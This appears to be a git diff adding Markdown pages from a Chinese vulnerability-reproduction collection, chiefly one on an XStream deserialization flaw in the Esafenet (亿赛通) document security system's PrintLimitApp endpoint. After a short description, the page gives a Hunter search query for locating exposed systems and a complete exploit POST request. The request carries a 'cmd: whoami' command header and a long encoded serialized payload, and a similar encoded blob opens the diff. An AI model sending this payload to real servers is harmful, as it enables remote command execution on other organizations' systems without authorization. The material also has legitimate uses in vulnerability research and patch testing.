MMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706606710985-5e871cd6-a0ba-41a9-b550-b415089498f8.png](./img/XmvjKIvAHgRrl84Y/1706606710985-5e871cd6-a0ba-41a9-b550-b415089498f8-866712.png)
+
+
+
+> 更新: 2024-04-20 22:01:32  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ze4mkcyw9cxp57n1>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统PrintLimitApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统PrintLimitApp存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..87f8074
--- /dev/null
+++ b/亿赛通电子文档安全管理系统PrintLimitApp存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统PrintLimitApp存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统PrintLimitApp存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/_yjz0d-97miWet3n/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-116873.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/PrintLimitApp HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.31.208:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMK